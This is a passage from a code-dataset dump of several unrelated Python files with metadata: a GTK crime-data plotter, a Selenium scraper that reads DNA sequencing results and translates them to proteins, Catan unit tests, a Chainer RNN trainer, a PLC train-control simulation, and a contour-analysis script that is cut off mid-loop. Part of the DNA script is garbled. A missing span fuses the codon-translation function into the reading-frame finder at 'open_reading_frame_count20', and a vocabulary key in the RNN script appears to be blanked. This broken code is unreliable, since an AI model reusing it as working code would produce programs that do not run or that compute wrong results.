@self.combobox_state.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(False)\n\t\telif(self.combobox_district.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(True)\n\t\telif (self.combobox_year.get_active_text() == \"All\"):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(True)\t\n\t\telse:\n\t\t\tself.button_show_graph.set_sensitive(False)\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\t\t\n\t\treturn\n\n\tdef on_changed_crime(self, widget):\n\t\tif(self.combobox_year.get_active_text() != 'All'):\t\t\n\t\t\tintyear = int(self.combobox_year.get_active_text())\n\n\t\t# Check crime field\n\t\tif \" \" not in self.combobox_crime.get_active_text():\n\t\t\tcrime = self.combobox_crime.get_active_text()\n\t\telse:\n\t\t\tcrime = \".\".join(self.combobox_crime.get_active_text().split(\" \"))\n\n\t\tif(self.combobox_district.get_active_text() == 'All' and self.combobox_year.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\telif(self.combobox_district.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\telif (self.combobox_year.get_active_text() == \"All\"):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\t\n\t\telse:\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\treturn\n\n\tdef compare_states(self, widget):\n\t\tcrimes = [\"MURDER\", \"RAPE\", \"KIDNAPPING.ABDUCTION\", \"RIOTS\", \"ROBBERY\", \"BURGLARY\", \"DOWRY.DEATHS\"]\n\t\tintyear = int(self.combobox_yearc.get_active_text()) \n\t\tstate1_data = self.data.query('STATEorUT == @self.combobox_state1.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT', 'DISTRICT', 'YEAR', crimes[0], crimes[1],crimes[2],crimes[3],crimes[4],crimes[5],crimes[6]])[self.data.DISTRICT == 'TOTAL']\n\t\tstate2_data = self.data.query('STATEorUT == @self.combobox_state2.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT', 'DISTRICT', 'YEAR', crimes[0], crimes[1],crimes[2],crimes[3],crimes[4],crimes[5],crimes[6]])[self.data.DISTRICT == 'TOTAL']\n\t\tprint(state1_data.iloc[0]['MURDER'])\n\n\t\tstate1_total = [state1_data.iloc[0][crimes[0]],state1_data.iloc[0][crimes[1]],state1_data.iloc[0][crimes[2]],state1_data.iloc[0][crimes[3]],state1_data.iloc[0][crimes[4]],state1_data.iloc[0][crimes[5]],state1_data.iloc[0][crimes[6]]]\n\t\tstate2_total = [state2_data.iloc[0][crimes[0]],state2_data.iloc[0][crimes[1]],state2_data.iloc[0][crimes[2]],state2_data.iloc[0][crimes[3]],state2_data.iloc[0][crimes[4]],state2_data.iloc[0][crimes[5]],state2_data.iloc[0][crimes[6]]]\n\t\tprint(state1_total)\n\n\t\tdialog = gtk.Dialog(\"My dialog\",\n\t\tself,\n\t\tgtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,\n\t\t(gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))\n\t\tfig = Figure(figsize=(5, 4), dpi=100)\n\t\tdialog.set_size_request(1300,500)\n\t\tax = fig.add_subplot(111)\n\t\typos = np.arange(len(crimes))\n\t\tprint(ypos)\n\t\tp1 = ax.bar(ypos-0.4, state1_total, width=0.4, color='r', align='center')\n\t\tp2 = ax.bar(ypos, state2_total, width=0.4, color='b', align='center')\n\n\t\tax.set_title(\"Comparison of \" + self.combobox_state1.get_active_text() + \" and \" + self.combobox_state2.get_active_text())\n\t\tax.set_xticks(ypos-0.2)\n\t\tax.set_xticklabels(crimes)\n\t\tax.set_ylabel('Total Crimes')\n\t\tax.legend((p1[0], p2[0]), (self.combobox_state1.get_active_text(), self.combobox_state2.get_active_text()))\n\n\t\tcanvas = FigureCanvas(fig) # a gtk.DrawingArea\n\t\tcanvas.set_size_request(800, 600)\n\t\tdialog.vbox.pack_start(canvas)\n\t\ttoolbar = NavigationToolbar(canvas, dialog)\n\t\tdialog.vbox.pack_start(toolbar, False, False)\n\t\tcanvas.show()\n\t\tdialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\treturn\t\t\n\nPyApp()\ngtk.main()\n\n","sub_path":"ics3.py","file_name":"ics3.py","file_ext":"py","file_size_in_byte":20791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"548653523","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport re\nimport sys\n\ndef login(driver):\n print('Logging in')\n driver.get('https://clims4.genewiz.com/RegisterAccount/Login')\n fill_box = driver.find_element_by_xpath('//*[@id=\"LoginName\"]')\n fill_box.clear()\n fill_box.send_keys('******')\n fill_box = driver.find_element_by_xpath('//*[@id=\"Password\"]')\n fill_box.send_keys('*****')\n driver.find_element_by_xpath('//*[@id=\"btnSubmit\"]').click()\n\ndef sample_search(driver):\n global sample_status\n table = driver.find_element_by_xpath('//*[@id=\"myOrdersTable\"]/tbody')\n try:\n for i,td in enumerate(table.find_elements_by_xpath('//*[@id=\"myOrdersTable\"]/tbody/tr/td[4]'),1):\n if td.text == '':\n continue\n number_search=re.match('^\\d+-',td.text)\n if number_search == None:\n number_value=''\n else:\n number_value=number_search.group(0)\n if td.text == (number_value+user_input):\n number_of_samples=driver.find_element_by_xpath(f'//*[@id=\"myOrdersTable\"]/tbody/tr[{i}]/td[9]')\n sample_status=driver.find_element_by_xpath(f'//*[@id=\"myOrdersTable\"]/tbody/tr[{i}]/td[11]/button')\n driver.find_element_by_xpath(f'//*[@id=\"myOrdersTable\"]/tbody/tr[{i}]/td[11]/button').click()\n break\n print(f'\\n{number_of_samples.text} samples detected\\n')\n print(f'\\nEstimated time of completion {int(number_of_samples.text)*2} seconds')\n flag=True\n except:\n flag=False\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH,'//*[@id=\"myOrdersTable_paginate\"]/ul/li[8]/a'))).click()\n return flag\n\n\nsample_status=()\nuser_input=sys.argv[1]\ndef get_sequence():\n global sample_status\n start_time = time.time()\n print('Starting Program')\n options = Options()\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"--start-maximized\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument('--disable-extensions')\n options.add_argument('--no-sandbox')\n options.add_argument(\"--headless\")\n options.add_argument('log-level=3')\n options.add_argument('--proxy-server=\"direct://\"')\n options.add_argument('--proxy-bypass-list=*')\n driver = webdriver.Chrome(options=options)\n login(driver)\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH,'//*[@id=\"hs-eu-confirmation-button\"]'))).click()\n print('\\nCompiling Sequences\\n')\n page=0\n while sample_search(driver) is False:\n page+=1\n print(f'Checking Page {page}')\n if page>50:\n print(f'Sequence ID does not exist')\n print('Ending Program')\n sample_status='Error'\n return\n if sample_status.text != 'View Results':\n print('\\nSample is not finished sequencing yet\\n')\n return\n WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"gwzSngrOrderResultPanelRoot\"]/table/tbody')))\n seq_list=[]\n table=driver.find_element_by_xpath('//*[@id=\"gwzSngrOrderResultPanelRoot\"]/table/tbody')\n for x,sequence in enumerate(table.find_elements_by_xpath('//*[@id=\"gwzSngrOrderResultPanelRoot\"]/table/tbody/tr/td[9]'),1):\n WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, f'//*[@id=\"gwzSngrOrderResultPanelRoot\"]/table/tbody//tr[{x}]/td[9]/span[2]'))).click()\n seq_list.append([(WebDriverWait(driver, 20).until(EC.visibility_of_element_located((By.XPATH, \"//*[@id='gwzViewResultsModalDialog']/div/div/div[2]/div\"))).text)])\n WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"gwzViewResultsModalDialog\"]/div/div/div[3]/button'))).click()\n #print(time.time() - start_time)\n driver.close()\n return seq_list\n\n\ndna_codon_dict={'TTT':'F','TTC':'F',\n 'TTA':'L','TTG':'L',\n 'CTT':'L','CTC':'L',\n 'CTA':'L','CTG':'L',\n 'ATT':'I','ATC':'I',\n 'ATA':'I','ATG':'M',\n 'GTT':'V','GTC':'V',\n 'GTA':'V','GTG':'V',\n 'TCT':'S','TCC':'S',\n 'TCA':'S','TCG':'S',\n 'CCT':'P','CCC':'P',\n 'CCA':'P','CCG':'P',\n 'ACT':'T','ACC':'T',\n 'ACA':'T','ACG':'T',\n 'GCT':'A','GCC':'A',\n 'GCA':'A','GCG':'A',\n 'TAT':'Y','TAC':'Y',\n 'CAT':'H','CAC':'H',\n 'CAA':'Q','CAG':'Q',\n 'AAT':'N','AAC':'N',\n 'AAA':'K','AAG':'K',\n 'GAT':'D','GAC':'D',\n 'GAA':'E','GAG':'E',\n 'TGT':'C','TGC':'C',\n 'TGG':'W','CGT':'R',\n 'CGC':'R','CGA':'R',\n 'CGG':'R','AGT':'S',\n 'AGC':'S','AGA':'R',\n 'AGG':'R','GGT':'G',\n 'GGC':'G','GGA':'G',\n 'GGG':'G','TAA':'X',\n 'TAG':'X','TGA':'X'}\n\nDNA_complement_dict={'A':'T',\n 'T':'A',\n 'G':'C',\n 'C':'G',\n 'N':'N'}\n\ndef rev(global_codon_list):\n return [DNA_complement_dict[codons] for codons in reversed(global_codon_list)]\n\n\ndef codon_translation(global_codon_list):\n codon_triple_list=[]\n open_reading_frame_lists=[[],[],[],]\n for i,codons in enumerate(open_reading_frame_lists,1):\n codon_triple_list.clear()\n open_reading_frame_count=1\n for codons in global_codon_list:\n if open_reading_frame_count20:\n sequences_to_search.append(''.join(sequence_to_add_to_search_list))\n sequence_to_add_to_search_list.clear()\n else:\n sequence_to_add_to_search_list.clear()\n return sequences_to_search\n\n\n\n\nglobal_codon_list=[]\nsequence_list1=[]\ndef manual_mode():\n global global_codon_list\n global sequence_list1\n sample_statues_check=get_sequence()\n if sample_status == 'Error':\n return\n if sample_statues_check == None:\n print('\\nEnding program\\n')\n return\n for i,sequence in enumerate(sample_statues_check):\n title=re.search(r'^>.*\\n',sequence[0])\n remove_title=re.sub(r'^>.*\\n','',sequence[0])\n global_codon_list=re.sub(r'\\n','',remove_title)\n sequences_to_search=find_open_reading_frames(global_codon_list)\n sequence_to_search=[]\n print(f'\\nsample {title.group(0)}')\n for number,sequences in enumerate(sequences_to_search,1):\n print(f'row {number} sequence: {sequences}')\n sequence_to_search.append(sequences)\n pick_sequence_to_search=input('indicate which row # sequence to search, if no match, type \"n\": ')\n if pick_sequence_to_search != 'n':\n sequence_list1.append(sequence_to_search[int(pick_sequence_to_search)-1])\n questionairre_question=input('would you like to search BLAST and or save your sequence and translated protein? (y/n): ')\n if questionairre_question != 'n':\n questionairre(title)\n else:\n reverse_loop(title)\n if sequence_list1 != []:\n questionairre_question=input('would you like to search BLAST and or save your sequence and translated protein? (y/n): ')\n if questionairre_question != 'n':\n questionairre(title)\n\ndef questionairre(title):\n BLAST_question=input('Would you like to run sequence against BLAST? (y/n): ')\n if BLAST_question != 'n':\n BLAST()\n dna_save_file_question=input('Would you like to save your DNA file?\\n If yes, please type in the desired filename, else type \"n\": ')\n if dna_save_file_question != 'n':\n with open(dna_save_file_question,'w') as dna_file:\n dna_file.write(title.group(0)+global_codon_list)\n protein_save_file_question=input('Would you like to save your translated protein sequence?\\nIf yes, please type in the desired filename, else type \"n\": ')\n if protein_save_file_question !='n':\n with open(protein_save_file_question,'w') as protein_file:\n protein_file.write(title.group(0)+'\\n'+(''.join(sequence_list1)))\n expasy_question=input('Would you like to generate an expasy file for your protein? (y/n): ')\n if expasy_question != 'n':\n expasy()\n\n\ndef reverse_loop(title):\n global global_codon_list\n global sequence_list1\n\n global_codon_list=rev(global_codon_list)\n sequences_to_search=find_open_reading_frames(global_codon_list)\n sequence_to_search=[]\n print(f'sample {title.group(0)}')\n for number,sequence in enumerate(sequences_to_search,1):\n print(f'row {number} sequence: {sequence}')\n sequence_to_search.append(sequence)\n pick_sequence_to_search=input('indicate which row # sequence to search, if no match, type \"n\": ')\n if pick_sequence_to_search != 'n':\n sequence_list1.append(sequence_to_search[int(pick_sequence_to_search)-1])\n else:\n print('\\nYour protein was not found in Sequencing\\n')\n sequence_list1.clear()\n\n\ndef BLAST():\n driver = webdriver.Chrome()\n driver.get('https://blast.ncbi.nlm.nih.gov/Blast.cgi?PROGRAM=blastp&PAGE_TYPE=BlastSearch&LINK_LOC=blasthome')\n fill_box = driver.find_element_by_xpath('/html/body/div[2]/div/div[2]/form/div[3]/fieldset/div[1]/div[1]/textarea')\n fill_box.clear()\n fill_box.send_keys(''.join(sequence_list1))\n sumbit_button=driver.find_element_by_xpath('/html/body/div[2]/div/div[2]/form/div[6]/div/div[1]/div[1]/input')\n sumbit_button.click()\n while True:\n try:\n tmp = driver.title\n except:\n break\ndef expasy():\n driver = webdriver.Chrome()\n driver.get('https://web.expasy.org/protparam/')\n fill_box = driver.find_element_by_xpath('/html/body/div[2]/div[2]/form/textarea')\n fill_box.clear()\n fill_box.send_keys(''.join(sequence_list1))\n sumbit_button=driver.find_element_by_xpath('/html/body/div[2]/div[2]/form/p[1]/input[2]')\n sumbit_button.click()\n while True:\n try:\n tmp = driver.title\n except:\n print('program done')\n break\n\nprotein_size=100\ndef find_open_reading_frames_auto_mode(global_codon_list):\n sequences_to_search=[]\n sequence_to_add_to_search_list=[]\n add_to_string=False\n for open_reading_frames in codon_translation(global_codon_list):\n for amino_acids in open_reading_frames:\n if amino_acids == 'M':\n add_to_string=True\n if add_to_string is True:\n sequence_to_add_to_search_list.append(amino_acids)\n if amino_acids == 'X':\n add_to_string=False\n if len(sequence_to_add_to_search_list)>protein_size:\n sequences_to_search.append(''.join(sequence_to_add_to_search_list))\n sequence_to_add_to_search_list.clear()\n else:\n sequence_to_add_to_search_list.clear()\n return sequences_to_search\n\ndef reverse_loop_auto(title):\n global global_codon_list\n global sequence_list1\n\n global_codon_list=rev(global_codon_list)\n sequences_to_search=find_open_reading_frames_auto_mode(global_codon_list)\n sequence_to_search=[]\n print(f'sample {title.group(0)}')\n for number,sequence in enumerate(sequences_to_search,1):\n print(f'row {number} sequence: {sequence}')\n sequence_to_search.append(sequence)\n if sequence_to_search == []:\n print(f'{title.group(0)} not found')\n\ndef auto_mode():\n global global_codon_list\n global sequence_list1\n sample_statues_check=get_sequence()\n if sample_status == 'Error':\n return\n if sample_statues_check == None:\n print('\\nEnding program\\n')\n return\n for i,sequence in enumerate(sample_statues_check):\n title=re.search(r'^>.*\\n',sequence[0])\n remove_title=re.sub(r'^>.*\\n','',sequence[0])\n global_codon_list=re.sub(r'\\n','',remove_title)\n sequences_to_search=find_open_reading_frames_auto_mode(global_codon_list)\n sequence_to_search=[]\n print(f'\\nsample {title.group(0)}')\n for number,sequences in enumerate(sequences_to_search,1):\n print(f'row {number} sequence: {sequences}')\n sequence_to_search.append(sequences)\n if sequences_to_search == []:\n print('\\nno forward sequence found, checking reverse sequence\\n')\n reverse_loop_auto(title)\n\ndef main_loop():\n auto_or_manual_question=input('would you like auto-mode, or manual mode? (type auto for auto-mode, manual for maual mode): ')\n if auto_or_manual_question == 'auto':\n auto_mode()\n else:\n manual_mode()\n\n\nmain_loop()\n","sub_path":"DTB_V2.py","file_name":"DTB_V2.py","file_ext":"py","file_size_in_byte":14127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"626485891","text":"from catan_core.building.settlement import Settlement\nfrom catan_core.edge import Edge\nfrom catan_core.player.player import Player\nfrom catan_core.road import Road\nfrom catan_core.vertex import Vertex\n\n\nclass TestEdge:\n def test_init_no_vertices(self):\n edge = Edge(id=0)\n assert edge.id == 0\n assert edge.vertices == []\n\n def test_repr(self):\n assert Edge(id=0).__repr__() == \"edge-0\"\n\n def test_set_vertices(self):\n edge = Edge(id=0)\n vertex = Vertex(id=0)\n\n edge.vertices = [vertex]\n\n assert edge.vertices == [vertex]\n\n def test_assign_road(self):\n player = Player()\n edge = Edge(id=0)\n assert not edge.road\n road = Road(player=player)\n edge.assign_road(road=road)\n assert edge.road == road\n\n def test_can_place_road_returns_false_if_road_already_exists(self):\n edge = Edge(id=0)\n player = Player()\n edge.road = Road(player=player)\n assert not edge.can_place_road(player=player)\n\n def test_can_place_road_returns_false_if_no_adjacent_roads_for_player(\n self,\n ):\n player1 = Player()\n player2 = Player()\n\n edge = Edge(id=0)\n edge_no_road = Edge(id=1)\n edge_with_road_player2 = Edge(id=2)\n edge_with_road_player2.road = Road(player=player2)\n\n v1 = Vertex(id=0)\n v2 = Vertex(id=1)\n\n # Connect vertex to edges\n edge.vertices = [v1, v2]\n edge_no_road.vertices = [v1]\n edge_with_road_player2.vertices = [v2]\n v1.edges = [edge, edge_no_road]\n v2.edges = [edge, edge_with_road_player2]\n\n assert not edge.can_place_road(player=player1)\n\n def test_can_place_road_retruns_true_if_adjacent_building_for_player(self):\n player = Player()\n\n edge = Edge(id=0)\n vertex = Vertex(id=0)\n\n edge.vertices = [vertex]\n vertex.edges = [edge]\n vertex.assign_building(building=Settlement(player=player))\n\n assert edge.can_place_road(player=player)\n\n def test_can_place_road_returns_true_if_adjacent_road_for_player(self):\n player = Player()\n\n edge = Edge(id=0)\n edge_with_road = Edge(id=1)\n edge_with_road.road = Road(player=player)\n\n vertex = Vertex(id=0)\n\n # Connect vertex to edges\n edge.vertices = [vertex]\n edge_with_road.vertices = [vertex]\n vertex.edges = [edge, edge_with_road]\n\n assert edge.can_place_road(player=player)\n","sub_path":"catan_core/test/test_edge.py","file_name":"test_edge.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"277561532","text":"import numpy as np\nimport chainer\nfrom chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils\nfrom chainer import Link, Chain, ChainList\nimport chainer.functions as F\nimport chainer.links as L\n\nfrom impls import rnn, helpers\n\nname = helpers.get_script_name(__file__)\ndata_path = '.data/ptb.train.min.txt'\ndest_root = '.dest'\n\nvocab = {}\ntrain_data = helpers.load_data(data_path, vocab)\n\neos_id = vocab['']\ndemb = 100\nmodel = rnn.Rnn(len(vocab), eos_id, demb)\noptimizer = optimizers.Adam()\noptimizer.setup(model)\n\nfor epoch in range(5):\n s = []\n for pos in range(len(train_data)):\n id = train_data[pos]\n s.append(id)\n if id == eos_id:\n model.zerograds()\n loss = model(s)\n loss.backward()\n optimizer.update()\n s = []\n outfile = \"{0}/rnn-{1}.model\".format(dest_root, epoch)\n serializers.save_npz(outfile, model)\n","sub_path":"try-chainer/chapter07/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"30608012","text":"# ====== Legal notices\r\n#\r\n# Copyright (C) 2013 GEATEC engineering\r\n#\r\n# This program is free software.\r\n# You can use, redistribute and/or modify it, but only under the terms stated in the QQuickLicence.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY, without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\r\n# See the QQuickLicence for details.\r\n#\r\n# The QQuickLicense can be accessed at: http://www.geatec.com/qqLicence.html\r\n#\r\n# __________________________________________________________________________\r\n#\r\n#\r\n# THIS PROGRAM IS FUNDAMENTALLY UNSUITABLE FOR CONTROLLING REAL SYSTEMS !!\r\n#\r\n# __________________________________________________________________________\r\n#\r\n# It is meant for training purposes only.\r\n#\r\n# Removing this header ends your licence.\r\n#\r\n\r\nimport simpylc as sp\r\n\r\nclass Control (sp.Module):\r\n def __init__ (self):\r\n sp.Module.__init__ (self)\r\n \r\n self.page ('train control')\r\n\r\n self.group ('control buttons', True)\r\n self.brakeLiftButton = sp.Marker ()\r\n self.driveEnableButton = sp.Marker ()\r\n\r\n self.group ('warning lamps')\r\n self.brakeWarnLamp = sp.Marker ()\r\n self.speedWarnLamp = sp.Marker ()\r\n\r\n self.group ('state')\r\n self.accel = sp.Register ()\r\n self.speed = sp.Register ()\r\n self.position = sp.Register ()\r\n\r\n self.group ('auxiliary', True)\r\n self.maxSpeed = sp.Register ()\r\n self.speedWarnFraction = sp.Register (0.8)\r\n self.oldSpeed = sp.Register ()\r\n self.blinkTime = sp.Register (0.5)\r\n self.blinkTimer = sp.Timer ()\r\n self.blinkEdge = sp.Oneshot ()\r\n self.blinkOn = sp.Marker ()\r\n\r\n self.group ('sweep time measurement')\r\n self.sweepMin = sp.Register (sp.finity)\r\n self.sweepMax = sp.Register ()\r\n self.watchTime = sp.Register (2)\r\n self.watchTimer = sp.Timer ()\r\n self.run = sp.Runner ()\r\n\r\n def input (self):\r\n self.part ('speed')\r\n self.speed.set (sp.world.physics.speed)\r\n self.maxSpeed.set (sp.world.physics.maxSpeed)\r\n\r\n self.part ('position')\r\n self.position.set (sp.world.physics.position)\r\n\r\n def sweep (self):\r\n self.part ('dynamics')\r\n self.accel.set ((self.speed - self.oldSpeed) / sp.world.period)\r\n self.oldSpeed.set (self.speed)\r\n\r\n self.part ('warnings')\r\n self.blinkTimer.reset (self.blinkTimer > self.blinkTime)\r\n self.blinkEdge.trigger (not self.blinkTimer)\r\n self.blinkOn.mark (not self.blinkOn, self.blinkEdge)\r\n self.brakeWarnLamp.mark (not self.brakeLiftButton and self.driveEnableButton and self.blinkOn)\r\n self.speedWarnLamp.mark (self.speed > self.speedWarnFraction * self.maxSpeed and self.blinkOn)\r\n \r\n self.part ('sweep time masurement')\r\n self.sweepMin.set (sp.world.period, sp.world.period < self.sweepMin)\r\n self.sweepMax.set (sp.world.period, sp.world.period > self.sweepMax)\r\n self.watchTimer.reset (self.watchTimer > self.watchTime)\r\n self.sweepMin.set (sp.finity, not self.watchTimer)\r\n self.sweepMax.set (0, not self.watchTimer)\r\n \r\n def output (self):\r\n self.part ('control signals')\r\n sp.world.physics.brakeLift.mark (self.brakeLiftButton)\r\n sp.world.physics.driveEnable.mark (self.driveEnableButton)\r\n \r\n","sub_path":"module_plc_besturingen/les_2_van_simulatie_naar_on_site_debugging/progs/train/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"598320110","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom palettable.colorbrewer.qualitative import Paired_9 as mycorder\r\nfrom shapely.geometry import LineString, Point, MultiPoint\r\nimport warnings\r\nfrom viroconcom.contours import Contour\r\nfrom viroconcom.read_write import read_ecbenchmark_dataset, read_contour\r\nfrom viroconcom.plot import plot_contour, plot_confidence_interval\r\n\r\ndataset_char = 'D'\r\nreturn_period = 50\r\n\r\nlastname_firstname = [\r\n 'Wei_Bernt',\r\n 'GC_CGS',\r\n 'hannesdottir_asta',\r\n 'haselsteiner_andreas',\r\n 'BV',\r\n 'mackay_ed',\r\n 'qiao_chi',\r\n 'rode_anna',\r\n 'vanem_DirectSampling',\r\n]\r\nn_contours_to_analyze = len(lastname_firstname)\r\n\r\nclass Object(object):\r\n pass\r\n\r\n\r\n# Code from https://github.com/ahaselsteiner/2020-paper-omae-hierarchical-models/blob/master/contour_intersection.py\r\ndef contour_intersection(contour_x, contour_y, line_x, line_y, do_plot_in_case_of_failure=False):\r\n \"\"\"\r\n Computes the intersection point between two lines.\r\n The first line should be the environmental contour and the second line a\r\n straight line. If there are more multiple intersections the point that has\r\n the longest distance to the origin is returned (assuming the origin is at\r\n the first point of the straight line).\r\n Parameters\r\n ----------\r\n contour_x : ndarray of floats,\r\n Coordinates in the first dimension of the contour.\r\n contour_y : ndarray of floats\r\n Coordinates in the second dimension of the contour.\r\n line_x : ndarray of floats\r\n Coordinates in the first dimension of the straight line.\r\n line_y : ndarray of floats\r\n Coordaintes in the second dimension of the straight line.\r\n do_plot_in_case_of_failure : Boolean,\r\n if True a plot of the two lines for which no intersection could be\r\n found is shown.\r\n Returns\r\n -------\r\n x : float\r\n Intersection coordinate in the first dimension.\r\n y : float\r\n Intersection coordinate in the second dimension.\r\n \"\"\"\r\n\r\n point_list_l1 = list()\r\n for x,y in zip(contour_x, contour_y):\r\n point = Point(x, y)\r\n point_list_l1.append(point)\r\n contour = LineString(point_list_l1)\r\n\r\n point_list_l2 = list()\r\n for x,y in zip(line_x, line_y):\r\n point = Point(x, y)\r\n point_list_l2.append(point)\r\n line2 = LineString(point_list_l2)\r\n\r\n intersection = contour.intersection(line2)\r\n if type(intersection) is Point:\r\n return intersection.x, intersection.y\r\n if type(intersection) is MultiPoint:\r\n if len(intersection.geoms) > 0:\r\n print(str(len(intersection.geoms)) + ' intersections were found.'\r\n + ' Using the intersection that is the farthest'\r\n + ' away from the origin.')\r\n origin = Point(line_x[0], line_y[0])\r\n for i, p in enumerate(intersection.geoms):\r\n if i == 0:\r\n inter_x = p.x\r\n inter_y = p.y\r\n longest_distance = origin.distance(p)\r\n else:\r\n if origin.distance(p) > longest_distance:\r\n inter_x = p.x\r\n inter_y = p.y\r\n return inter_x, inter_y\r\n else:\r\n print('The result is: ' + str(intersection))\r\n warnings.warn('No point of intersection could be found. '\r\n 'Returning (nan, nan).', UserWarning)\r\n if do_plot_in_case_of_failure:\r\n fig = plt.figure(figsize=(5, 5), dpi=150)\r\n fig.add_subplot(111)\r\n plt.plot(contour_x, contour_y, 'b-')\r\n plt.plot(line_x, line_y, 'r-')\r\n plt.show()\r\n return np.nan, np.nan\r\n\r\n# Code from: https://github.com/ahaselsteiner/2020-paper-omae-hierarchical-models/blob/master/contour_statistics.py#L44\r\ndef thetastar_to_theta(thetastar, xspread, yspread):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n thetastar : ndarray of floats\r\n Angle in the normalized coordinate system.\r\n xspread : float\r\n Spread of x (xmax - ymin).\r\n yspread : float\r\n Spread of y (ymax - amin).\r\n Returns\r\n -------\r\n theta : float,\r\n The angle theta in the original coordinate system. The angle is\r\n defined counter clockwise, 0 at (x=1, y=0) and is converted to be\r\n inside the interval [0 360).\r\n \"\"\"\r\n theta = np.arctan2(np.sin(thetastar) * yspread, np.cos(thetastar) * xspread)\r\n for i, t in enumerate(theta):\r\n if t < 0:\r\n theta[i] = t + 2 * np.pi\r\n return theta\r\n\r\ncolors_for_contribution = mycorder.mpl_colors\r\nfor idx in range(2):\r\n colors_for_contribution.append(colors_for_contribution[8])\r\ncolors_for_contribution.append('blue')\r\n\r\n\r\nfig, axs = plt.subplots(1, 2, sharey=True, figsize=(8, 4))\r\nmax_hs_of_sample = 0\r\n\r\n# Load the environmental data.\r\nfile_name_provided = 'datasets/' + dataset_char + '.txt'\r\nv_p, hs_p, label_v, label_hs = read_ecbenchmark_dataset(file_name_provided)\r\nmax_hs_of_sample = max([max_hs_of_sample, max(hs_p)])\r\n\r\ncontours = []\r\ncontours_v = []\r\ncontours_hs = []\r\nmax_hs_on_contours = np.empty(n_contours_to_analyze)\r\nfor i in range(n_contours_to_analyze):\r\n contribution_nr = i + 1\r\n if 11 >= contribution_nr >= 9:\r\n contribution_nr = 9\r\n elif contribution_nr > 11:\r\n # Because contribution 9 holds 3 sets of contours.\r\n contribution_nr = contribution_nr - 2\r\n folder_name = 'results/exercise-1/contribution-' + str(contribution_nr)\r\n file_name = folder_name + '/' + lastname_firstname[i] + '_dataset_' + \\\r\n dataset_char + '_' + str(return_period) + '.txt'\r\n if contribution_nr in (1, 2, 3, 5, 6, 8, 10):\r\n (hs, v) = read_contour(file_name)\r\n else:\r\n (v, hs) = read_contour(file_name)\r\n contour = Object()\r\n contour.c = (np.append(v, v[0]), np.append(hs, hs[0]))\r\n contours.append(contour)\r\n contours_v.append(v)\r\n contours_hs.append(hs)\r\n max_hs_on_contours[i] = max(hs[~np.isnan(hs)])\r\n\r\n# Compute the min, max and median contour.\r\n# First, define the origin and angles based on normalization.\r\nv0 = np.mean(v_p)\r\nhs0 = np.mean(hs_p)\r\nangle_step_for_ci = 2\r\ntheta_stars = np.arange(0, 360, angle_step_for_ci) / 180 * np.pi\r\nt1 = max(v_p) - min(v_p)\r\nt2 = max(hs_p) - min(hs_p)\r\nthetas = thetastar_to_theta(theta_stars, t1, t2)\r\nnr_of_datapoints_on_angled_line = 10\r\nline_tot_length = 50.0\r\nline_length = np.linspace(0.0, line_tot_length, nr_of_datapoints_on_angled_line)\r\n\r\n# Then, compute lines that have an angle theta to the x-axis.\r\nfor i, contour in enumerate(contours):\r\n 